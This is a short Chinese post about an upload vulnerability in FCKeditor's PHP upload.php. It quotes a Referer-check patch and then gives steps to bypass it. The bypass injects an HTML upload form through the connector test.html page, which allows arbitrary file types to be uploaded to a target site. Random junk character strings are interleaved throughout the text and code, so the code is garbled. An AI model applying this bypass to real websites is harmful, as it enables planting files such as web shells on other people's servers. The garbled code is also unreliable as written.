漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
7 i' V8 p5 A L, P网上给出的修复方案是
9 [; `2 o$ m' x4 L& A1 M0 [修复方法,删除FCK编辑器用其他的编辑器3 \- z* F/ f/ P8 u# F: x& P8 _
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
/ q$ s' C5 P/ ^2 t) j% U h在; v j* l+ `: L% ~
require(‘config.php’);
; z$ m" ]6 {6 Srequire(‘util.php’);3 w t1 s4 Y& A+ K5 u
的下面添加以下代码—————————–- {; f1 O( b6 |( A, _
//防止外部提交
! X/ k% s5 v% G! j6 G; ?function outsidepost()) w0 c- k4 \5 b# Q# [
{ w. d- ]- }7 C0 Y4 w' R7 f, K
$servername=$_SERVER['SERVER_NAME'];( {, W3 } N8 s# m: |
$sub_from=@$_SERVER['HTTP_REFERER'];: k+ L+ H; F9 k i( \ B p
$sub_len=strlen($servername);; w" x) N! }" \3 f7 o, n/ p; _( ~
$checkfrom=substr($sub_from,7,$sub_len);
7 {4 G& U' A. Fif($checkfrom!=$servername){5 G- n6 r: r' t3 Q% `, q- P
echo(“you don’t outsidepost!”);
4 \+ z! i |' r9 q% v6 Oexit;# S% b/ d5 N! r8 r
}, Q5 F/ C" ]9 Y4 y1 Z
}5 J8 s) X& v& d2 n4 I2 z7 x
outsidepost();6 z' g E$ I6 g7 _9 Y
防止外部提交,但是没有防止内部提交,5 T) N! P- g% _ l4 z+ [, U7 D# I- K
利用方法:
# {/ \8 i7 ?/ ?; @2 h/ X/ g( p1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html/ X% V" u$ z0 [7 s3 X: E
2,在Current Folder 框输入
% \) M" K& M& b<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
4 S" Y* r$ X e: |& \5 E然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
/ n2 u8 Q0 I; j! G+ ~PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |